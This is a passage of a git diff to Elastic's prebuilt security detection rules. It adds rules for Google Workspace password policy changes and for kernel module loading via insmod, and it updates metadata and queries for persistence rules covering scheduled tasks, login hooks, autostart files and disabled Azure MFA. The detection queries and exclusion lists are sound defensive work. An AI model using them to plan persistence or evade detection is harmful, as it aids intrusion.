"google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ad3f2807-2b3e-47d7-b282-f84acbbe14be", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_policy_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_policy_modified.json new file mode 100644 index 0000000000000..a3fc5fdf7f11f --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_policy_modified.json @@ -0,0 +1,86 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects when a Google Workspace password policy is modified. An adversary may attempt to modify a password policy in order to weaken an organization\u2019s security controls.", + "false_positives": [ + "Password policies may be modified by system administrators. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-130m", + "index": [ + "filebeat-*", + "logs-google_workspace*" + ], + "interval": "10m", + "language": "kuery", + "license": "Elastic License v2", + "name": "Google Workspace Password Policy Modified", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and\n event.action:(CHANGE_APPLICATION_SETTING or CREATE_APPLICATION_SETTING) and\n google_workspace.admin.setting.name:(\n \"Password Management - Enforce strong password\" or\n \"Password Management - Password reset frequency\" or\n \"Password Management - Enable password reuse\" or\n \"Password Management - Enforce password policy at next login\" or\n \"Password Management - Minimum password length\" or\n \"Password Management - Maximum password length\"\n )\n", + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + }, + { + "ecs": false, + "name": "google_workspace.admin.setting.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "a99f82f5-8e77-4f8b-b3ce-10c0f6afbc73", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Cloud", + "Google Workspace", + "Continuous Monitoring", + "SecOps", + "Identity and Access", + "Persistence" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1098", + "name": "Account Manipulation", + "reference": "https://attack.mitre.org/techniques/T1098/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 15 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json index 8c3018514febb..c283d16ae6a07 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_google_workspace_role_modified.json @@ -15,13 +15,42 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Role Modified", - "note": "## Config\n\nThe Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:google_workspace.admin and event.provider:admin and event.category:iam and event.action:(ADD_PRIVILEGE or UPDATE_ROLE)\n", "references": [ "https://support.google.com/a/answer/2406043?hl=en" ], + "related_integrations": [ + { + "package": "google_workspace", + "version": "1.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6f435062-b7fc-4af9-acea-5b1ead65c5a5", + "setup": "The Google Workspace Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +79,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json index d1a2e8e5f6e95..35e6c8f6d229a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_gpo_schtask_service_creation.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Creation or Modification of a new GPO Scheduled Task or Service", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.path : (\"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\ScheduledTasks\\\\ScheduledTasks.xml\",\n \"?:\\\\Windows\\\\SYSVOL\\\\domain\\\\Policies\\\\*\\\\MACHINE\\\\Preferences\\\\Preferences\\\\Services\\\\Services.xml\") and\n not process.name : \"dfsrs.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "c0429aa8-9974-42da-bfb6-53a0a515a145", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json index bced9ad8da3b2..6a531cf567016 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_iam_group_creation.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Group Creation", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:CreateGroup and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/create-group.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_CreateGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "169f3a93-efc7-4df2-94d6-0d9438c310d1", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_insmod_kernel_module_load.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_insmod_kernel_module_load.json new file mode 100644 index 0000000000000..8e7b93b01ef3d --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_insmod_kernel_module_load.json @@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Detects the use of the insmod binary to load a Linux kernel object file. Threat actors can use this binary, given they have root privileges, to load a rootkit on a system providing them with complete control and the ability to hide from security products. Manually loading a kernel module in this manner should not be at all common and can indicate suspcious or malicious behavior.", + "from": "now-9m", + "index": [ + "logs-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel module load via insmod", + "query": "process where event.type == \"start\" and process.executable : \"/usr/sbin/insmod\" and process.args : \"*.ko\"\n", + "references": [ + "https://decoded.avast.io/davidalvarez/linux-threat-hunting-syslogk-a-kernel-rootkit-found-under-development-in-the-wild/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 85, + "rule_id": "2339f03c-f53f-40fa-834b-40c5983fc41f", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Persistence", + "Rootkit" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json index 347a92cfa8f76..20f94f4f93065 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_kde_autostart_modification.json @@ -11,15 +11,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via KDE AutoStart Script or Desktop File Modification", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "file where event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n )\n", + "note": "", + "query": "file where event.type != \"deletion\" and\n file.extension in (\"sh\", \"desktop\") and\n file.path :\n (\n \"/home/*/.config/autostart/*\", \"/root/.config/autostart/*\",\n \"/home/*/.kde/Autostart/*\", \"/root/.kde/Autostart/*\",\n \"/home/*/.kde4/Autostart/*\", \"/root/.kde4/Autostart/*\",\n \"/home/*/.kde/share/autostart/*\", \"/root/.kde/share/autostart/*\",\n \"/home/*/.kde4/share/autostart/*\", \"/root/.kde4/share/autostart/*\",\n \"/home/*/.local/share/autostart/*\", \"/root/.local/share/autostart/*\",\n \"/home/*/.config/autostart-scripts/*\", \"/root/.config/autostart-scripts/*\",\n \"/etc/xdg/autostart/*\", \"/usr/share/autostart/*\"\n ) and\n not process.name in (\"yum\", \"dpkg\", \"install\", \"dnf\", \"teams\", \"yum-cron\", \"dnf-automatic\")\n", "references": [ "https://userbase.kde.org/System_Settings/Autostart", "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/", "https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e3e904b3-0a8e-4e68-86a8-977a163e21d3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json index 91f99808903b9..e14dc175010d6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_job_creation.json @@ -15,10 +15,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Scheduled Job Creation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and\n file.path : \"?:\\\\Windows\\\\Tasks\\\\*\" and file.extension : \"job\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1327384f-00f3-44d5-9a8c-2373ba071e92", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json index 8ac95785e10d3..20c5bd047f9c5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_creation.json @@ -16,6 +16,53 @@ "license": "Elastic License v2", "name": "Local Scheduled Task Creation", "query": "sequence with maxspan=1m\n [process where event.type != \"end\" and\n ((process.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") or\n process.pe.original_file_name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"wmic.exe\", \"mshta.exe\",\n \"powershell.exe\", \"pwsh.dll\", \"powershell_ise.exe\", \"WmiPrvSe.exe\", \"wsmprovhost.exe\",\n \"winrshost.exe\")) or\n process.code_signature.trusted == false)] by process.entity_id\n [process where event.type == \"start\" and\n (process.name : \"schtasks.exe\" or process.pe.original_file_name == \"schtasks.exe\") and\n process.args : (\"/create\", \"-create\") and process.args : (\"/RU\", \"/SC\", \"/TN\", \"/TR\", \"/F\", \"/XML\") and\n /* exclude SYSTEM Integrity Level - look for task creations by non-SYSTEM user */\n not (?process.Ext.token.integrity_level_name : \"System\" or ?winlog.event_data.IntegrityLevel : \"System\")\n ] by process.parent.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "afcce5ad-65de-4ed2-8516-5e093d3ac99a", "severity": "low", @@ -51,5 +98,5 @@ } ], "type": "eql", - "version": 12 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json index 1489cb58d0110..7a3181d5ad74c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_local_scheduled_task_scripting.json @@ -16,7 +16,44 @@ "license": "Elastic License v2", "name": "Scheduled Task Created by a Windows Script", "note": "## Triage and analysis\n\nDecode the base64 encoded Tasks Actions registry value to investigate the task's configured action.", - "query": "sequence by host.id with maxspan = 30s\n [library where dll.name : \"taskschd.dll\" and process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [registry where registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "query": "sequence by host.id with maxspan = 30s\n [any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"taskschd.dll\" or file.name : \"taskschd.dll\") and\n process.name : (\"cscript.exe\", \"wscript.exe\", \"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\")]\n [registry where registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "689b9d57-e4d5-4357-ad17-9c334609d79a", "severity": "medium", @@ -52,5 +89,5 @@ } ], "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json index ce729c1812824..8421f8e15fe0d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_login_logout_hooks_defaults.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Persistence via Login or Logout Hook", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.name == \"defaults\" and process.args == \"write\" and process.args in (\"LoginHook\", \"LogoutHook\") and\n not process.args :\n (\n \"Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"Support/JAMF/ManagementFrameworkScripts/loginhook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/logouthook.sh\",\n \"/Library/Application Support/JAMF/ManagementFrameworkScripts/loginhook.sh\"\n )\n", "references": [ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2014/Wardle-VB2014.pdf", @@ -19,6 +19,7 @@ ], "risk_score": 47, "rule_id": "5d0265bf-dea9-41a9-92ad-48a8dcd05080", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +47,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json index 0ec8607f4d71d..666d45c0f77c0 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_loginwindow_plist_modification.json @@ -12,10 +12,32 @@ "license": "Elastic License v2", "name": "Potential Persistence via Login Hook", "note": "## Triage and analysis\n\nStarting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user reboots their machine. This can be abused to establish or maintain persistence on a compromised system.", - "query": "event.category:\"file\" and not event.type:\"deletion\" and\n file.name:\"com.apple.loginwindow.plist\" and\n process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor))\n", + "query": "event.category:\"file\" and not event.type:\"deletion\" and\n file.name:\"com.apple.loginwindow.plist\" and\n process.name:(* and not (systemmigrationd or DesktopServicesHelper or diskmanagementd or rsync or launchd or cfprefsd or xpcproxy or ManagedClient or MCXCompositor or backupd or \"iMazing Profile Editor\"\n))\n", "references": [ "https://github.com/D00MFist/PersistentJXA/blob/master/LoginScript.js" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ac412404-57a5-476f-858f-4e8fbb4f48d8", "severity": "medium", @@ -52,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json index 2514b5790d023..d24a8b6d5c3d6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/persistence_mfa_disabled_for_azure_user.json @@ -11,10 +11,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Multi-Factor Authentication Disabled for an Azure User", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating Multi-Factor Authentication Disabled for an Azure User\n\nMulti-factor authentication is a process in which users are prompted during the sign-in process for an additional form\nof identification, such as a code on their cellphone or a fingerprint scan.\n\nIf you only use a password to authenticate a user, it leaves an insecure vector for attack. If the password is weak or\nhas been exposed elsewhere, an attacker could be using it to gain access. When you require a second form of authentication,\nsecurity is increased because this additional factor isn't something that's easy for an attacker to obtain or duplicate.\n\nFor more information about using MFA in Azure AD, access the [official documentation](https://docs.microsoft.com/en-us/azure/active-directory/authentication/concept-mfa-howitworks#how-to-enable-and-use-azure-ad-multi-factor-authentication).\n\nThis rule identifies the deactivation of MFA for an Azure user account. This modification weakens account security\nand can lead to the compromise of accounts and other assets.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity can be done by administrators, all users must use MFA. The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the user and domain.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with\nyour IT teams to minimize the impact on business operations during these actions.\n- Reactivate multi-factor authentication for the user.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security defaults [provided by Microsoft](https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/concept-fundamentals-security-defaults).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Disable Strong Authentication\" and event.outcome:(Success or success)\n", + "related_integrations": [ + { + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.auditlogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "dafa3235-76dc-40e2-9f71-1773b96d24cf", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -43,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + 